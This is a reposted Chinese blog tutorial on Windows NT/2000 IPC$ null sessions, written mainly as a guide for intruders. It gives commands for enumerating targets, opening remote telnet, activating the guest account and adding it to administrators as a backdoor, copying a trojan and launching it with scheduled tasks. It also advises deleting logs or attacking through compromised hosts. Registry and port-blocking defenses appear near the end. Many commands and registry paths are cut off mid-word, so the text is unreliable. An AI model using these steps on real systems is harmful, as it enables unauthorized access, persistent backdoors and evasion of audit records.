天天看點

ipc$詳細解釋大全

一 前言 

二 什麼是ipc$ 

三 什麼是空會話 

四 空會話可以做什麼 

五 ipc$連接配接所使用的端口 

六 ipc$連接配接在hack攻擊中的意義 

七 ipc$連接配接失敗的常見原因 

八 複制檔案失敗的原因 

九 如何打開目标的ipc$共享以及其他共享 

十 一些需要shell才能完成的指令 

十一 入侵中可能會用到的相關指令 

十二 ipc$完整入侵 步驟祥解 

十三 如何防範ipc$入侵 

十四 ipc$入侵問答精選 

十五 結束的話

    一 前言

    網上關于ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,是以也沒人願意再把這已經成為定式的東西拿出來擺弄。 

不過話雖這樣說,但我個人認為這些文章講解的并不詳細,對于第一次接觸ipc$的菜鳥來說,簡單的羅列步驟并不能解答他們的種種迷惑(你随便找一個hack論壇搜一下ipc$,看看存在的疑惑有多少)。是以我參考了網上的一些資料,教程以及論壇文章,寫了這篇總結性質的文章,想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地! 

注意:本文所讨論的各種情況均預設發生在win nt/2000環境下,win98将不在此次讨論之列,而鑒于win xp在安全設定上有所提高,個别操作并不适用,有機會将單獨讨論。

    二 什麼是ipc$

    ipc$(internet process c 

平時我們總能聽到有人在說ipc$漏洞,ipc$漏洞,其實ipc$并不是一個真正意義上的漏洞,我想之是以有人這麼說,一定是指微軟自己安置的那個‘後門’:空會話(null sessi 

    三 什麼是空會話

    在介紹空會話之前,我們有必要了解一下一個安全會話是如何建立的。

在windows nt 4.0中是使用挑戰響應協定與遠端機器建立一個會話的,建立成功的會話将成為一個安全隧道,建立雙方通過它互通資訊,這個過程的大緻順序如下: 

1)會話請求者(客戶)向會話接收者(伺服器)傳送一個資料包,請求安全隧道的建 

立; 

2)伺服器産生一個随機的64位數(實作挑戰)傳送回客戶; 

3)客戶取得這個由伺服器産生的64位數,用試圖建立會話的帳号的密碼打亂它,将結 

果傳回到伺服器(實作響應); 

4)伺服器接受響應後發送給本地安全驗證(lsa),lsa通過使用該使用者正确的密碼來核實響應以便确認請求者身份。如果請求者的帳号是伺服器的本地帳号,核實本地發生;如果請求的帳号是一個域的帳号,響應傳送到域控制器去核實。當對挑戰的響應核實為正确後,一個通路令牌産生,然後傳送給客戶。客戶使用這個通路令牌連接配接到伺服器上的資源直到建議的會話被終止。 

以上是一個安全會話建立的大緻過程,那麼空會話又如何呢?

    空會話是在沒有信任的情況下與伺服器建立的會話(即未提供使用者名與密碼),但根據win2000的通路控制模型,空會話的建立同樣需要提供一個令牌,可是空會話在建立過程中并沒有經過使用者資訊的認證,是以這個令牌中不包含使用者資訊,是以,這個會話不能讓系統間發送加密資訊,但這并不表示空會話的令牌中不包含安全辨別符sid(它辨別了使用者和所屬組),對于一個空會話,lsa提供的令牌的sid是s-1-5-7,這就是空會話的sid,使用者名是:anonymous logon(這個使用者名是可以在使用者清單中看到的,但是是不能在sam資料庫中找到,屬于系統内置的帳号),這個通路令牌包含下面僞裝的組: 

every 

network 

在安全政策的限制下,這個空會話将被授權通路到上面兩個組有權通路到的一切資訊。那麼建立空會話到底可以作什麼呢?

    四 空會話可以做什麼

    對于nt,在預設安全設定下,借助空連接配接可以列舉目标主機上的使用者和共享,通路every 2000 和以後版本中預設隻有管理者和備份操作員有權從網絡通路到系統資料庫,而且實作起來也不友善,需借助工具。從這些我們可以看到,這種非信任會話并沒有多大的用處,但從一次完整的ipc$入侵來看,空會話是一個不可缺少的跳闆,因為我們從它那裡可以得到戶清單,這對于一個老練的黑客已經足夠了。以下是空會話中能夠使用的具體指令:

    1 首先,我們先建立一個空會話(需要目标開放ipc$) 

注意:上面的指令包括四個空格,net與use中間有一個空格,use後面一個,密碼左右各一個空格。

    2 檢視遠端主機的共享資源 

解釋:建立了空連接配接後,用此指令可以檢視遠端主機的共享資源,如果它開了共享,可以得到如下類似類似結果: 

在 \\*.*.*.*的共享資源 

資源共享名 類型 用途 注釋

----------------------------------------------------------- 

netlogon disk logon server share 

sysvol disk logon server share 

指令成功完成。

    3 檢視遠端主機的目前時間 

解釋:用此指令可以得到一個遠端主機的目前時間。

    4 得到遠端主機的netbios使用者名清單(需要打開自己的nbt) 

nbtstat -a ip 

用此指令可以得到一個遠端主機的netbios使用者名清單(需要你的netbios支援),傳回如下結果:

node ipaddress: [*.*.*.*] scope id: []

netbios remote machine name table

name type status 

--------------------------------------------- 

server <00> unique registered 

oyamanishi-h <00> group registered 

oyamanishi-h <1c> group registered 

server <20> unique registered 

oyamanishi-h <1b> unique registered 

oyamanishi-h <1e> group registered 

server <03> unique registered 

oyamanishi-h <1d> unique registered 

..__msbrowse__.<01> group registered 

inet~services <1c> group registered 

is~server......<00> unique registered

mac address = 00-50-8b-9a-2d-37

以上就是我們經常使用空會話做的事情,好像也能獲得不少東西喲,不過要注意一點:建立ipc$連接配接的操作會在eventlog中留下記錄,不管你是否登入成功。 好了,那麼下面我們就來看看ipc$所使用的端口是什麼? 

   五 ipc$所使用的端口

    首先我們來了解一些基礎知識: 

1 smb:(server message block) windows協定族,用于檔案列印共享的服務; 

2 nbt:(netbios over tcp/ip)使用137(udp)138(udp)139(tcp)端口實作基于tcp/ip協定的netbios網絡互聯。 

3 在windowsnt中smb基于nbt實作,而在windows2000中,smb除了基于nbt實作,還可以直接通過445端口實作。

    有了這些基礎知識,我們就可以進一步來讨論通路網絡共享對端口的選擇了:

    對于win2000用戶端來說: 

1 如果在允許nbt的情況下連接配接伺服器時,用戶端會同時嘗試通路139和445端口,如果445端口有響應,那麼就發送rst包給139端口斷開連接配接,用455端口進行會話,當445端口無響應時,才使用139端口,如果兩個端口都沒有響應,則會話失敗; 

2 如果在禁止nbt的情況下連接配接伺服器時,那麼用戶端隻會嘗試通路445端口,如果445端口無響應,那麼會話失敗。由此可見,禁止了nbt後的win 2000對win nt的共享通路将會失敗。

    對于win2000伺服器端來說: 

1 如果允許nbt, 那麼udp端口137, 138, tcp 端口 139, 445将開放; 

2 如果禁止nbt,那麼隻有445端口開放。

    我們建立的ipc$會話對端口的選擇同樣遵守以上原則。顯而易見,如果遠端伺服器沒有監聽139或445端口,ipc$會話是無法建立的。

    六 ipc$連接配接在hack攻擊中的意義

    就像上面所說的,即使你建立了一個空的連接配接,你也可以獲得不少的資訊(而這些資訊往往是入侵中必不可少的),如果你能夠以某一個具有一定權限的使用者身份登陸的話,那麼你就會得到相應的權限,顯然,如果你以管理者身份登陸,嘿嘿,那你可就了不得了,基本上可以為所欲為了。不過你也不要高興的太早,因為管理者的密碼不是那麼好搞到的,雖然會有一些粗心的管理者存在弱密碼,但這畢竟是少數,而且現在不比從前了,随着人們安全意識的提高,管理者們也愈加小心了,得到管理者密碼将會越來越難的,是以今後你最大的可能就是以極小的權限甚至是沒有權限進行連接配接,甚至在主機不開啟ipc$共享時,你根本就無法連接配接,你會慢慢的發現ipc$連接配接并不是萬能的,是以不要奢望每次連接配接都能成功,那是不現實的。 

是不是有些灰心?倒也不用,關鍵是我們要擺正心态,不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它隻是很多入侵方法中的一種,你有可能利用它一擊必殺,也有可能一無所獲,這些都是正常的,在黑客的世界裡,不是每條大路都能通往羅馬,但總有一條路會通往羅馬,耐心的尋找吧! 

七 ipc$連接配接失敗的常見原因

    以下是一些常見的導緻ipc$連接配接失敗的原因:

1 ipc連接配接是windows nt及以上系統中特有的功能,由于其需要用到windows nt中很多dll函數,是以不能在windows 9.x/me系統中運作,也就是說隻有nt/2000/xp才可以互相建立ipc$連接配接,98/me是不能建立ipc$連接配接的;

2 如果想成功的建立一個ipc$連接配接,就需要對方開啟ipc$共享,即使是空連接配接也是這樣,如果對方關閉了ipc$共享,你将會建立失敗;

3 你未啟動lanmanworkstati

4 對方未啟動lanmanserver服務,它提供了 rpc 支援、檔案、列印以及命名管道共享,ipc$依賴于此服務,沒有它遠端主機将無法響應你的連接配接請求(顯示名為:server);

5 對方未啟動netlog pass-through 帳戶登入身份;

6 對方禁止了nbt(即未打開139端口);

7 對方防火牆屏蔽了139和445端口;

8 你的使用者名或者密碼錯誤(顯然空會話排除這種錯誤);

9 指令輸入錯誤:可能多了或少了空格,當使用者名和密碼中不包含空格時兩邊的雙引号可以省略,如果密碼為空,可以直接輸入兩個引号""即可;

10 如果在已經建立好連接配接的情況下對方重新開機計算機,那麼ipc$連接配接将會自動斷開,需要重建立立連接配接。

    另外,你也可以根據傳回的錯誤号分析原因: 

錯誤号5,拒絕通路:很可能你使用的使用者不是管理者權限的,先提升權限; 

錯誤号51,windows無法找到網絡路徑:網絡有問題; 

錯誤号53,找不到網絡路徑:ip位址錯誤;目标未開機;目标lanmanserver服務未啟動;目标有防火牆(端口過濾); 

錯誤号67,找不到網絡名:你的lanmanworkstati 

錯誤号1219,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個ipc$,請删除再連; 

錯誤号1326,未知的使用者名或錯誤密碼:原因很明顯了; 

錯誤号1792,試圖登入,但是網絡登入服務沒有啟動:目标netlog 

錯誤号2242,此使用者的密碼已經過期:目标有帳号政策,強制定期要求更改密碼。

    八 複制檔案失敗的原因

    有些朋友雖然成功的建立了ipc$連接配接,但在copy時卻遇到了這樣那樣的麻煩,無法複制成功,那麼導緻複制失敗的常見原因又有哪些呢?

1 盲目複制 

2 預設共享判斷錯誤 

這類錯誤也是大家經常犯的,主要有兩個小方面:

1)錯誤的認為能建立ipc$連接配接的主機就一定開啟了預設共享,因而在建立完連接配接之後馬上向admin$之類的預設共享複制檔案,導緻複制失敗。ipc$連接配接成功隻能說明對方打開了ipc$共享,ipc$共享與預設共享是兩碼事,ipc$共享是一個命名管道,并不是哪個實際的檔案夾,而預設共享并不是ipc$共享的必要條件;

3使用者權限不夠,包括四種情形: 

1)空連接配接向所有共享(預設共享和普通共享)複制時,大多情況下權限是不夠的; 

2)向預設共享複制時,要具有管理者權限; 

3)向普通共享複制時,要具有相應權限(即對方事先設定的通路權限); 

4)對方可以通過防火牆或安全軟體的設定,禁止外部通路共享;

    還需要說明一點:不要認為administrator就一定是管理者,管理者名稱是可以改的。

4被防火牆殺死或在區域網路 

也許你的複制操作已經成功,但當遠端運作時,被防火牆殺掉了,導緻找不到檔案;還有可能你把木馬複制到了區域網路内的主機,導緻連接配接失敗。是以建議你複制時要小心,否則就前功盡棄了。

    呵呵,大家也知道,ipc$連接配接在實際操作過程中會出現千奇百怪的問題,上面我所總結的隻是一些常見錯誤,沒說到的,隻能讓大家自己去體會了。

    九 如何打開目标的ipc$共享以及其他共享

    目标的ipc$不是輕易就能打開的,否則就要天下打亂了。你需要一個admin權限的shell,比如telnet,木馬等,然後在shell下執行net share ipc$來開放目标的ipc$,用net share ipc$ /del來關閉共享。如果你要給它開共享檔案夾,你可以用net share baby=c:\,這樣就把它的c盤開為共享名為baby共享了。

    十 一些需要shell才能完成的指令

    看到很多教程這方面寫的十分不準确,一些需要shell才能完成指令就簡簡單單的在ipc$連接配接下執行了,起了誤導作用。那麼下面我總結一下需要在shell才能完成的指令:

1 向遠端主機建立使用者,激活使用者,修改使用者密碼,加入管理組的操作需要在shell下完成;

2 打開遠端主機的ipc$共享,預設共享,普通共享的操作需要在shell下完成;

3 運作/關閉遠端主機的服務,需要在shell下完成;

4 啟動/殺掉遠端主機的程序,也需要在shell下完成。

[page]

    十一 入侵中可能會用到的相關指令

    請注意指令适用于本地還是遠端,如果适用于本地,你隻能在獲得遠端主機的shell後,才能向遠端主機執行。

1 建立空連接配接: 

2 建立非空連接配接: 

3 檢視遠端主機的共享資源(但看不到預設共享) 

4 檢視本地主機的共享資源(可以看到本地的預設共享) 

net share

5 得到遠端主機的使用者名清單 

nbtstat -a ip

6 得到本地主機的使用者清單 

net user

7 檢視遠端主機的目前時間 

8 顯示本地主機目前服務 

net start

9 啟動/關閉本地服務 

net start 服務名 /y 

net stop 服務名 /y

10 映射遠端共享: 

此指令将共享名為baby的共享資源映射到z盤

11 删除共享映射 

net use c: /del 删除映射的c盤,其他盤類推 

net use * /del /y删除全部

12 向遠端主機複制檔案 

13 遠端添加計劃任務 

注意:時間盡量使用24小時制;在系統預設搜尋路徑(比如system32/)下不用加路徑,否則必須加全路徑

14 開啟遠端主機的telnet 

這裡要用到一個小程式:opentelnet.exe,各大下載下傳站點都有,而且還需要滿足四個要求:

1)目标開啟了ipc$共享 

2)你要擁有管理者密碼和帳号 

3)目标開啟remoteregistry服務,使用者就該ntlm認證 

4)對win2k/xp有效,nt未經測試 

試例如下:c:\>opentelnet.exe \\*.*.*.* administrator "" 1 90

15 激活使用者/加入管理者組 

1 net uesr account /active:yes 

2 net localgroup administrators account /add

16 關閉遠端主機的telnet 

同樣需要一個小程式:resumetelnet.exe 

試例如下:c:\>resumetelnet.exe \\*.*.*.* administrator ""

17 删除一個已建立的ipc$連接配接 

    十二 ipc$完整入侵步驟祥解

    其實入侵步驟随個人愛好有所不同,我就說一下常見的吧,呵呵,獻醜了!

1 用掃描軟體搜尋存在若密碼的主機,比如流光,sss,x-scan等,随你的便,然後鎖定目标,如果掃到了管理者權限的密碼,你可以進行下面的步驟了,假設你現在得到了administrator的密碼為空

2 此時您有兩條路可以選擇:要麼給對方開telnet(指令行),要麼給它傳木馬(圖形界面),那我們就先走telnet這條路吧

3上面開telnet的指令沒忘吧,要用到opentelnet這個小程式 

如果傳回如下資訊 

******************************************************* 

remote telnet c by refdom 

opentelnet.exe

notice!!!!!! 

the telnet service default setting:ntlmauthor=2 telnetport=23

starting telnet service... 

telnet service is started successfully! telnet service is running!

bingle!!!yeah!! 

telnet port is 90. you can try:"telnet ip 90", to c the server! 

disc server...successfully! 

*說明你已經打開了一個端口90的telnet。

4 現在我們telnet上去 

telnet 192.168.21.* 90 

如果成功,你将獲得遠端主機的一個shell,此時你可以像控制自己的機器一樣控制你的殭屍電腦了,那麼做點什麼呢?把guest激活再加入管理組吧,就算留個後門了

5 c:\>net user guest /active:yes 

*将guest使用者激活,也有可能人家的guest本來就試活的,你可以用net user guest看一下它的帳戶啟用的值是yes還是no

6 c:\>net user guest 1234 

*将guest的密碼改為1234,或者改成你喜歡的密碼

7 c:\>net localgroup administrators guest /add 

*将guest變為administrator,這樣,即使以後管理者更改了他的密碼,我們也可以用guest登入了,不過也要提醒您,因為通過安全政策的設定,可以禁止guest等帳戶的遠端通路,呵呵,如果真是這樣,那我們的後門也就白做了,願上帝保佑guest。

8 好了,現在我們來走另一條路,給它傳個木馬玩玩

9 首先,我們先建立起ipc$連接配接 

10 既然要上傳東西,就要先知道它開了什麼共享 

c disk 

d disk 

指令成功完成。 

*好了,我們看到對方共享了c,d兩個盤,我們下面就可以向任意一個盤複制檔案了。再次聲明,因為用net view指令無法看到預設共享,是以通過上面傳回的結果,我們并不能判斷對方是否開啟了預設共享。

已複制 1 個檔案 

*用這個指令你可以将木馬用戶端love.exe傳到對方的c盤下,當然,如果能複制到系統檔案夾下是最好的了,不容易被發現

12 運作木馬前,我們先看看它現在的時間 

指令成功完成

13 現在我們用at運作它吧,不過對方一定要開了task scheduler服務(允許程式在指定時間運作),否則就不行了 

新加了一項作業,其作業 id = 1

14 剩下就是等了,等過了11:02,你就可以用控制端去連接配接了,如果成功你将可以用圖形界面去控制遠端主機了,如果連接配接失敗,那麼它可能在區域網路裡,也可能程式被防火牆殺了,還可能它下線了(沒這麼巧吧),無論哪種情況你隻好放棄了

講了ipc$的入侵,就不能不說如何防範,那麼具體要怎樣做呢?看下面 

    十三 如何防範ipc$入侵

1 禁止空連接配接進行枚舉(此操作并不能阻止空連接配接的建立)

方法1: 

運作regedit,找到如下主鍵[hkey_local_machine\system\currentc = dword的鍵值改為:1 

如果設定為"1",一個匿名使用者仍然可以連接配接到ipc$共享,但限制通過這種連接配接得到列舉sam帳号和共享等資訊;在windows 2000 中增加了"2",限制所有匿名通路除非特别授權,如果設定為2的話,可能會有一些其他問題發生,建議設定為1。如果上面所說的主鍵不存在,就建立一個再改鍵值。

方法2: 

在本地安全設定-本地政策-安全選項-在'對匿名連接配接的額外限制'中做相應設定

2 禁止預設共享

1)察看本地共享資源 

運作-cmd-輸入net share

2)删除共享(重起後預設共享仍然存在) 

net share ipc$ /delete 

net share admin$ /delete 

net share c$ /delete 

net share d$ /delete(如果有e,f,……可以繼續删除)

3)停止server服務 

net stop server /y (重新啟動後server服務會重新開啟)

4)禁止自動打開預設共享(此操作并未關閉ipc$共享) 

運作-regedit

server版:找到如下主鍵[hkey_local_machine\system\currentc

pro版:找到如下主鍵[hkey_local_machine\system\currentc 

如果上面所說的主鍵不存在,就建立(右擊-建立-雙位元組值)一個主健再改鍵值。 

這兩個鍵值在預設情況下在主機上是不存在的,需要自己手動添加。

3 關閉ipc$和預設共享依賴的服務:server服務 

控制台-管理工具-服務-找到server服務(右擊)-屬性-正常-啟動類型-選已禁用 

這時可能會有提示說:xxx服務也會關閉是否繼續,因為還有些次要的服務要依賴于lanmanserver,不要管它。

4 屏蔽139,445端口 

由于沒有以上兩個端口的支援,是無法建立ipc$的,是以屏蔽139,445端口同樣可以阻止ipc$入侵。

1)139端口可以通過禁止nbt來屏蔽 

本地連接配接-tcp/it屬性-進階-wins-選‘禁用tcp/it上的netbios’一項

2)445端口可以通過修改系統資料庫來屏蔽 

添加一個鍵值 

hive: hkey_local_machine 

key: system\c 

name: smbdeviceenabled 

type: reg_dword 

value: 0 

修改完後重新開機機器

注意:如果屏蔽掉了以上兩個端口,你将無法用ipc$入侵别人。

3)安裝防火牆進行端口過濾

5 設定複雜密碼,防止通過ipc$窮舉出密碼。

    十四 ipc$入侵問答精選

    上面說了一大堆的理論東西,但在實際中你會遇到各種各樣的問題,是以為了給予大家最大的幫助,我看好幾個安全論壇,找了n多的文章,從中整理了一些有代表性的問答,其中的一些答案是我給出的,一些是論壇上的回複,如果有什麼疏漏和錯誤,還請包涵。

1.進行ipc$入侵的時候,會在伺服器中留下記錄,有什麼辦法可以不讓伺服器發現嗎?

答:留下記錄是一定的,你走後用程式删除就可以了,或者用殭屍電腦入侵。

2.你看下面的情況是為什麼,可以連接配接但不能複制 

指令成功 

找不到網絡路徑 

指令不成功

答:可能有兩個原因: 

1)你的權限不夠,不能通路預設共享;

2)對方沒有開啟admin$預設共享,不要認為能進行ipc$連接配接,對方就一定開了預設共享(很多人都這麼以為,誤區!!),此時你可以試試别的預設共享或普通共享,比如c$,d$,c,d等,如果還是不行,就要看你的權限了,如果是管理者權限,你可以開telnet,如果能成功,在給它開共享也行。

3.如果對方開了ipc$,且能建立空聯接,但打開c、d盤時,都要求密碼,我知道是空連接配接沒有太多的權限,但沒别的辦法了嗎?

答:建議先用流光或者别的什麼猜解一下密碼,如果猜不出來,隻能放棄,畢竟空連接配接的能力有限。

答:首先糾正你的一個錯誤,用net view是無法看到預設共享的。既然你現在有管理者權限,而且對方又開了ipc$,建議你用opentelnet.exe這個小程式打開它的telent,在獲得了這個shell之後,做什麼都可以了。

5.ipc$連接配接成功後,我用下面的指令建立了一個帳戶,卻發現這個帳戶在我自己的機器上,這是怎麼回事? 

net uset ccbirds /add

答:ipc$建立成功隻能說明你與遠端主機建立了通信隧道,并不意味你取得了一個shell,隻有在獲得一個shell之後,你才能在遠端建立一個帳戶,否則你的操作隻是在本地進行。

6.我已進入了一台肉機,用的管理者帳号,可以看他的系統時間,但是複制程式到他的機子上卻不行,每次都提示“拒絕通路,已複制0個檔案”,是不是對方有什麼服務沒開,我該怎麼辦?

答:不能copy檔案有多個可能,除了權限不夠外,還可能是對方c$,d$等預設管理共享沒開,或者是對方為ntfs檔案格式,通過設定,管理者也未必能遠端寫檔案。既然你有管理者權限,那就開telnet上去吧,然後在開它的共享。

7.我用win98能與對方建立ipc$連接配接嗎?

答:不可以的,要進行ipc$的操作,建議用win2000

答:空會話在預設的情況下是可以導出使用者清單的,但如果管理者通過修改系統資料庫來禁止導出清單,就會出現你所說的情況;或者你自己的nbt沒有打開,netstat是建立在nbt之上的。  

9.我建立ipc$連接配接的時候傳回如下資訊:‘提供的憑據與已存在的憑據集沖突’,怎麼回事?

10.我在映射的時候出現: 

系統發生 85 錯誤。 

本地裝置名已在使用中。這是怎麼回事?

答:你也太粗心了吧,這說明你的h盤正在使用,映射到别的盤符吧!

系統發生 5 錯誤。 

拒絕通路。

答:呵呵,向你要密碼說明你目前使用的使用者權限不夠,不能映射c$這個預設共享,想辦法提升權限或者找管理者的弱密碼吧!預設共享一般是需要管理者權限的。

12.我用superscan掃到了一個開了139端口的主機,但為什麼不能空連接配接呢?

答:你混淆了ipc$與139的關系,能進行ipc$連接配接的主機一定開了139或445端口,但開這兩個端口的主機可不一定能空連接配接,因為對方可以關閉ipc$共享.

13.我門區域網路裡的機器大多都是xp,我用流光掃描到幾個administrator帳号密碼是空,而且可以連接配接,但不能複制東西,說錯誤5。請問為什麼?

答:xp的安全性要高一些,在安全政策的預設設定中,對本地帳戶的網絡登入進行身份驗證的時候,預設為來賓權限,即使你用管理者遠端登入,也隻具有來賓權限,是以你複制檔案,當然是錯誤5:權限不夠。

答:雖然你具有管理者權限,但管理者在設定c盤共享權限時可能并未設定允許administrator通路,是以會出現問題。

15.如果自己的機器禁止了ipc$, 是不是還可以用ipc連接配接别的機器?

答:可以的。

本文轉自CC部落格51CTO部落格,原文連結http://blog.51cto.com/levelive/5851如需轉載請自行聯系原作者

刀博士